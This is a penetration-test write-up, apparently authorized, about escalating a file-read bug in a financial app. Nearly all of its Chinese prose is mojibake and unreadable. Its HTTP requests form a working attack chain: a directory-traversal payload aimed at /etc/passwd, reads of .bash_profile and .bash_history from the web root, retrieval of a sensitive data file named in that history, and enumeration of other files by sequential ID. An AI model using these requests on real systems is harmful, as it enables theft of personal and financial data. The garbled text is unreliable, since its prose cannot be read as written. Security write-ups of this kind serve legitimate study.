ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬£¬£¬£¬£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬£¬£¬£¬£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ¡£¡£¡£¡£¡£
PS£º±¾ÎĽöÓÃÓÚÊÖÒÕÌÖÂÛÓëÆÊÎö£¬£¬£¬£¬£¬ÑϽûÓÃÓÚÈκβ»·¨ÓÃ;£¬£¬£¬£¬£¬Î¥ÕßЧ¹û×Ô×𡣡£¡£¡£¡£
0x00 ÆðԴ̽²â
·¢Ã÷Ê״η¿ªAPPʱ£¬£¬£¬£¬£¬»áÏòЧÀÍÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬¡£¡£¡£¡£¡£
²âÊÔʱһ¶¨Òª×Ðϸ£¬£¬£¬£¬£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η¿ªAPPʱ£¬£¬£¬£¬£¬²Å»á¼ÓÔØÍ¼Æ¬£¬£¬£¬£¬£¬ºóÃæÔÙ·¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬£¬£¬£¬£¬¾Í²»»áÏòЧÀÍÆ÷ÔٴξÙÐÐÇëÇóÁË¡£¡£¡£¡£¡£

´Ë¼ÓÔØÕ¹Ê¾Í¼Æ¬µÄGETÇëÇóÊý¾Ý°üÈçÏ£º

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Äõ½Õâ¸öÊý¾Ý°üµÄµÚÒ»·´Ó¦£¬£¬£¬£¬£¬ÒÔÍùµÄÉøÍ¸²âÊÔÂÄÀú¸æËßÎÒ£¬£¬£¬£¬£¬´ÓÕâ¸öµØ·½»òÐí·»á±£´æÎļþ¶ÁÈ¡Îó²î¡£¡£¡£¡£¡£
ÆÊÎö²¢ÍƲ⹦ЧµãURIµÄÿ¸ö²ÎÊýµÄ¹¦Ð§¡£¡£¡£¡£¡£
LogonImageDir=/XXXXX/Pictures - ͼƬËùÔÚµÄĿ¼
SaveXxxxxImageName=this_is_image.jpg - Ŀ¼ÏµÄͼƬÃû
0x01 Îó²î²âÊÔ
¼ÈÈ»ÒѾÆðԴ̽²âµ½ÁË¿ÉÄܱ£´æÎó²îµÄΣº¦µã£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡¹¦Ð§µÄ²ÎÊýÒѾ¸ãÇåÎú£¬£¬£¬£¬£¬ÏÂÒ»²½¾ÍÕö¿ª¶ÁÈ¡²âÊÔ¡£¡£¡£¡£¡£
Ê×ÏȲâÊÔ£¬£¬£¬£¬£¬ÊÇ·ñ¿ÉÒÔ¾ÙÐÐĿ¼Áгö£¬£¬£¬£¬£¬Ö±½Ó½«SaveXxxxxImageName²ÎÊýÖÿգ¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔ¶ÁÈ¡/XXXXX/PicturesĿ¼ÏµÄÄÚÈÝ£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
·µ»ØÎª¡°¿Õ¡±£¬£¬£¬£¬£¬Ê§°Ü£¬£¬£¬£¬£¬ËµÃ÷³ÌÐò¹¦Ð§µã²»±£´æÁгöĿ¼Îó²î£º

²âÊÔÊÇ·ñ¿ÉÒÔÌø³öĿ¼£¬£¬£¬£¬£¬Ñ¡ÓÃPayloadÈçÏ£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
·µ»ØÄ³ºã·À»ðǽ×èµ²½çÃæ£¬£¬£¬£¬£¬Ê§°Ü£º


½ÓÏÂÀ´½øÒ»²½²âÊÔ£¬£¬£¬£¬£¬ÊÇ/etc/passwd´¥·¢µÄWAF£¬£¬£¬£¬£¬ÕÕ¾É/../´¥·¢µÄWAF¡£¡£¡£¡£¡£
²âÊÔÖ»¾ÙÐÐÒ»²ãÄ¿Â¼Ìø³ö£¬£¬£¬£¬£¬²¢ÇÒɾ³ý/etc/passwdÒªº¦×Ö£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ßí...¿´À´/../µÄÌØÊâ×Ö·û¾ÍÒѾ´¥·¢ÁËWAF£º

Ö®ºóÏ뵽ʵÑé¶ÔÊý¾Ý°ü¾ÙÐÐPOSTÀàÐÍת»»£¬£¬£¬£¬£¬Ê¹ÓÃPOST´«²ÎµÄһЩ·½·¨¾ÙÐÐWAFµÄ²âÊÔ£¬£¬£¬£¬£¬È磺
URL±àÂë
·Ö¿é´«Êä
ÔàÊý¾ÝÌî³ä
°üÌåת»»
»ûÐÎÊý¾Ý°ü
......
¿ÉÊÇÎÞÄΣ¬£¬£¬£¬£¬POSTÇëÇóÖ±½ÓÎÞ·¨´«²Î£¬£¬£¬£¬£¬³ÌÐòÏÞÖÆÁËGETÇëÇóÎüÊÕ²ÎÊý¡£¡£¡£¡£¡£
£¨²»¹ý£¬£¬£¬£¬£¬ØÊºó²âÊÔÆäËûPOST´«²ÎµÄ¹¦Ð§Ê±£¬£¬£¬£¬£¬·¢Ã÷ÒÔ±ÊÕßÏÖÓеÄWAFÈÆ¹ýÂÄÀú˼Ð÷£¬£¬£¬£¬£¬»ù´¡ÎÞ·¨¶ÔijºãµÄWAF¾ÙÐÐÈÆ¹ý.....£©
0x02 Îó²îÈ·ÈÏ
×ܽáÒÔÉ϶ԴËÎļþ¶ÁÈ¡Îó²îÍøÂçµ½µÄÐÅÏ¢£º
Ŀ¼ÎÞ·¨¿çÔ½£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡µÄ·¾¶ÔÚÄ¿½ñ¸ùĿ¼£»£»£»£»£»
ÌØÊâ×Ö·û´®£¬£¬£¬£¬£¬Òѱ»WAFÍêÉÆ·À»¤×¡£¡£¡£¡£¡£»£»£»£»£»
ÎÞ·¨»ñȡĿ¼ÏµÄÎļþÃû¡¢ÎÞ·¨Ô¤ÖªÊÇ·ñ¿ÉÒÔ¶ÁÈ¡ÆäËûºó׺Îļþ¡£¡£¡£¡£¡£
²âÊÔµ½ÕâÀïͻȻÁé¹âÒ»ÉÁ£¬£¬£¬£¬£¬Ïëµ½ÁË¡°.bash_history¡±£¬£¬£¬£¬£¬ÈôÊÇÍøÕ¾¸ùĿ¼±£´æ´ËÎļþ£¬£¬£¬£¬£¬²¢ÇÒ¿ÉÒÔ¶ÁÈ¡£¬£¬£¬£¬£¬ÉÏÃæµÄÒÉÎʾͿÉÒÔÖ±½Ó½â¾öÌ©°ëÁË£¬£¬£¬£¬£¬ÏÈÀ´ÏàʶһÏÂÕâЩÎļþ×÷Óãº
.bash_profile£º´ËÎļþΪϵͳµÄÿ¸öÓû§ÉèÖÃÇéÐÎÐÅÏ¢£¬£¬£¬£¬£¬µ±Óû§µÚÒ»´ÎµÇ¼ʱ£¬£¬£¬£¬£¬¸ÃÎļþ±»Ö´ÐС£¡£¡£¡£¡£
.bash_history£º¸ÃÎļþÉúÑÄÁËÄ¿½ñÓû§ÊäÈë¹ýµÄÀúÊ·ÏÂÁ£»£»£»£»
.bash_logout£º¸ÃÎļþµÄÓÃ;ÊÇÓû§×¢ÏúʱִÐеÄÏÂÁ£¬£¬£¬£¬Ä¬ÒÔΪ¿Õ£»£»£»£»£»
.bashrc£º´ËÎļþΪÿһ¸öÔËÐÐbash shellµÄÓû§Ö´ÐдËÎļþ¡£¡£¡£¡£¡£µ±bash shell±»·¿ªÊ±£¬£¬£¬£¬£¬¸ÃÎļþ±»¶ÁÈ¡¡£¡£¡£¡£¡£
ÓÚÊÇÖ±½Ó¶ÔÍøÕ¾¸ùĿ¼¾ÙÐÐ.bash_profileµÄä²â£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
´Ëpayload¼È×èÖ¹ÁËÌø³öĿ¼£¬£¬£¬£¬£¬ÓֱܿªÁËWAFÑÏ´òµÄÌØÊâ×Ö·û£¬£¬£¬£¬£¬¿ÉÊÇΨһÒÅ©µÄ.bashÎļþ±»ÎÒÃÇʹÓõ½ÁË¡£¡£¡£¡£¡£

¼¤¶¯µÄÐIJü¶¶µÄÊÖ£¬£¬£¬£¬£¬¿´À´Ä¿½ñÍøÕ¾¸ùĿ¼ȷʵÊÇ´ËÓû§µÄĿ¼£¬£¬£¬£¬£¬²¢ÇÒÓû§Ôڴ˸ùĿ¼ÏÂÖ´ÐйýÏÂÁ
½ÓÏÂÀ´ÊµÑé½øÒ»²½À©´óΣº¦¡£¡£¡£¡£¡£
0x03 Σº¦Éý¼¶
²»ÇåÎúÄ¿½ñĿ¼½á¹¹£¬£¬£¬£¬£¬¾Í´ú±í×ÅÎÞ·¨¶¨Ïò¶ÁÈ¡Îļþ£¬£¬£¬£¬£¬¿ÉÊÇÉÐÓÐÒ»¸ö.bash_historyÎÒÃÇûÓÐʹÓõ½£¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔÔÚÆäÖлñÈ¡µ½¸üÖ÷ÒªµÄÐÅÏ¢¡£¡£¡£¡£¡£
¶ÁÈ¡¸ùĿ¼ÏµÄ.bash_history£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ÐÅÏ¢Á¿ËäÈ»ÉÙ£¬£¬£¬£¬£¬¿ÉÊÇÒѾÓÐÁËеÄÏ£Íû£º

ÓÉÀúÊ·ÏÂÁîµÃÖª£¬£¬£¬£¬£¬ÖÎÀíÔ±cd½øÈëÁËÁ½²ãĿ¼£º/Nxxxx/xxFile/
²¢ÇÒÉó²éÁËxx_20201022_51xxx.txtÎļþ¡£¡£¡£¡£¡£
Ö±½Ó½á¹¹¶ÁÈ¡´ËÎļþ£¡
GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ÀֳɶÁÈ¡µ½ÁËÃô¸ÐµÄÊý¾ÝÐÅÏ¢£º

²¢ÇÒÎļþµÄIDֵΪʱ¼ä´Á+ID˳Ðò±àºÅ×é³É£¬£¬£¬£¬£¬¿ÉÇáËɱéÀú³öËùÓеÄÐÅÏ¢¡£¡£¡£¡£¡£
Burpsuite IntruderÄ£¿£¿£¿é²âÊÔ£º

ʵÑé±éÀú10¸öIDÖµÀֳɡ£¡£¡£¡£¡£
0x04 »ØÊ××ܽá
±£´æµÄÄÑÌ⣺Ŀ¼ÎÞ·¨¿çÔ½¡¢WAF¶¢·À¡¢ÎÞ·¨Ô¤ÖªÄ¿Â¼Îļþ½á¹¹¡£¡£¡£¡£¡£
ÔÚ´ËÇéÐÎÏ£¬£¬£¬£¬£¬Ê¹ÓÃLinuxÎļþÏµÍ³ÌØÕ÷£¬£¬£¬£¬£¬ÈÔÈ»¿ÉÒÔ½«µÍΣÎó²îÌáÉýÖÁ¸ßΣ¡£¡£¡£¡£¡£
²¢ÇÒΣº¦µÄÆ·¼¶Æéá«ÊÇÎÞ·¨Ô¤¹ÀµÄ£¬£¬£¬£¬£¬ÕâÈ¡¾öÓÚ.bash_history»á¸øÎÒÃÇй¶¼¸¶àÐÅÏ¢£¬£¬£¬£¬£¬ÒÔÊÇÎļþ¶ÁÈ¡Îó²î±£´æÊ±¼äÔ½¾Ã£¬£¬£¬£¬£¬¼Í¼µÄ¹¤¾ßÔ½¶à£¬£¬£¬£¬£¬Î£º¦Ô½´ó£¡
- Òªº¦´Ê±êÇ©£º
- ÍøÂçÇå¾² Îļþ¶ÁÈ¡Îó²î,

¾©¹«Íø°²±¸ 11010802026257ºÅ